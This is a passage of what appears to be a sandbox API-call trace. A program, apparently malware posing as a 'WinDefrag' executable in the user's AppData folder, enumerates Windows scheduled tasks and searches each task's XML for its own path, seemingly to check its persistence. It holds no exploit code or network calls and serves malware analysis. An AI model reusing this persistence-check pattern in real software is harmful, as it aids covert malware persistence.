pName=0x1edb10*="PBDADiscoveryW1") returned 0x0 [0259.333] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW1\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:7 /PBDADiscovery\r\n \r\n \r\n") returned 0x0 [0259.336] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW1\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:7 /PBDADiscovery\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.370] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.370] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.370] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="PBDADiscoveryW2") returned 0x0 [0259.370] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW2\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:90 /PBDADiscovery\r\n \r\n \r\n") returned 0x0 [0259.373] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW2\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:90 /PBDADiscovery\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.405] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.405] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.405] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="PeriodicScanRetry") returned 0x0 [0259.406] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-104)\r\n 2008-07-06T05:40:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-103)\r\n \\Microsoft\\Windows\\Media Center\\PeriodicScanRetry\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n 2006-09-09T17:33:00\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n \r\n \r\n \r\n %windir%\\ehome\\MCUpdate.exe\r\n -pscn 0\r\n \r\n \r\n") returned 0x0 [0259.408] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-104)\r\n 2008-07-06T05:40:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-103)\r\n \\Microsoft\\Windows\\Media Center\\PeriodicScanRetry\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n 2006-09-09T17:33:00\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n \r\n \r\n \r\n %windir%\\ehome\\MCUpdate.exe\r\n -pscn 0\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.450] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.450] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.450] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="PvrRecoveryTask") returned 0x0 [0259.450] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-129)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-130)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrRecoveryTask\r\n \r\n \r\n {7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8}\r\n \r\n \r\n \r\n") returned 0x0 [0259.453] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-129)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-130)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrRecoveryTask\r\n \r\n \r\n {7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.487] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.487] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.487] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="PvrScheduleTask") returned 0x0 [0259.487] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrScheduleTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-135)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-136)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrSchedule\r\n \r\n \r\n {CEF51277-5358-477b-858C-4E14F0C80BF7}\r\n \r\n \r\n \r\n") returned 0x0 [0259.490] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrScheduleTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-135)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-136)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrSchedule\r\n \r\n \r\n {CEF51277-5358-477b-858C-4E14F0C80BF7}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.521] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.521] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x11, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.521] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="RecordingRestart") returned 0x0 [0259.521] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RecordingRestart\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-127)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-128)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n false\r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehrec\r\n /RestartRecording\r\n \r\n \r\n") returned 0x0 [0259.524] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RecordingRestart\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-127)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-128)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n false\r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehrec\r\n /RestartRecording\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.581] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.581] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.581] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="RegisterSearch") returned 0x0 [0259.581] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RegisterSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-24)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRegisterSearch $(Arg0)\r\n \r\n \r\n") returned 0x0 [0259.583] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RegisterSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-24)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRegisterSearch $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.605] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.605] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x13, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.605] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="ReindexSearchRoot") returned 0x0 [0259.605] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ReindexSearchRoot\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoReindexSearchRoot\r\n \r\n \r\n") returned 0x0 [0259.607] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ReindexSearchRoot\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoReindexSearchRoot\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.634] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.634] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x14, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.634] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="SqlLiteRecoveryTask") returned 0x0 [0259.634] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\SqlLiteRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-133)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-134)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -SqlLiteRecoveryTask\r\n \r\n \r\n {59116E30-02BD-4b84-BA1E-5D77E809B1A2}\r\n \r\n \r\n \r\n") returned 0x0 [0259.637] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\SqlLiteRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-133)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-134)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -SqlLiteRecoveryTask\r\n \r\n \r\n {59116E30-02BD-4b84-BA1E-5D77E809B1A2}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.665] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.665] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.665] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="UpdateRecordPath") returned 0x0 [0259.665] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\UpdateRecordPath\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-13)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;S-1-5-80-567955335-3455378119-3305749985-2554534624-1867504835)(A;OICI;FRFWFXDTDCSD;;;S-1-5-80-3864065939-1897331054-469427076-3133256761-1570309435)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoUpdateRecordPath $(Arg0)\r\n \r\n \r\n") returned 0x0 [0259.667] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\UpdateRecordPath\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-13)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;S-1-5-80-567955335-3455378119-3305749985-2554534624-1867504835)(A;OICI;FRFWFXDTDCSD;;;S-1-5-80-3864065939-1897331054-469427076-3133256761-1570309435)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoUpdateRecordPath $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.696] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.696] IUnknown:Release (This=0x456b40) returned 0x0 [0259.696] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0259.697] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=1) returned 0x0 [0259.697] ITaskFolderCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x1edb00 | out: ppFolder=0x1edb00*=0x45a760) returned 0x0 [0259.697] ITaskFolder:GetTasks (in: This=0x45a760, flags=1, ppTasks=0x1ed990 | out: ppTasks=0x1ed990*=0x458030) returned 0x0 [0259.698] IRegisteredTaskCollection:get_Count (in: This=0x458030, pCount=0x1edae0 | out: pCount=0x1edae0*=0) returned 0x0 [0259.698] IUnknown:Release (This=0x458030) returned 0x0 [0259.698] ITaskFolder:GetFolders (in: This=0x45a760, flags=0, ppFolders=0x1ed978 | out: ppFolders=0x1ed978*=0x458030) returned 0x0 [0259.699] ITaskFolderCollection:get_Count (in: This=0x458030, pCount=0x1edaf8 | out: pCount=0x1edaf8*=0) returned 0x0 [0259.699] IUnknown:Release (This=0x458030) returned 0x0 [0259.699] TaskScheduler:IUnknown:Release (This=0x45a760) returned 0x0 [0259.699] IUnknown:Release (This=0x456b40) returned 0x0 [0259.699] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0259.700] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0259.700] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0259.702] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=2) returned 0x0 [0259.702] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458030) returned 0x0 [0259.702] IRegisteredTask:get_Name (in: This=0x458030, pName=0x1edb10 | out: pName=0x1edb10*="CorruptionDetector") returned 0x0 [0259.702] IRegisteredTask:get_Xml (in: This=0x458030, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\CorruptionDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Application Popup'] and EventID=1801]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n") returned 0x0 [0259.704] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\CorruptionDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Application Popup'] and EventID=1801]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.742] IUnknown:Release (This=0x458030) returned 0x0 [0259.743] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458030) returned 0x0 [0259.743] IRegisteredTask:get_Name (in: This=0x458030, pName=0x1edb10 | out: pName=0x1edb10*="DecompressionFailureDetector") returned 0x0 [0259.743] IRegisteredTask:get_Xml (in: This=0x458030, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\DecompressionFailureDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"><Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\">*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n 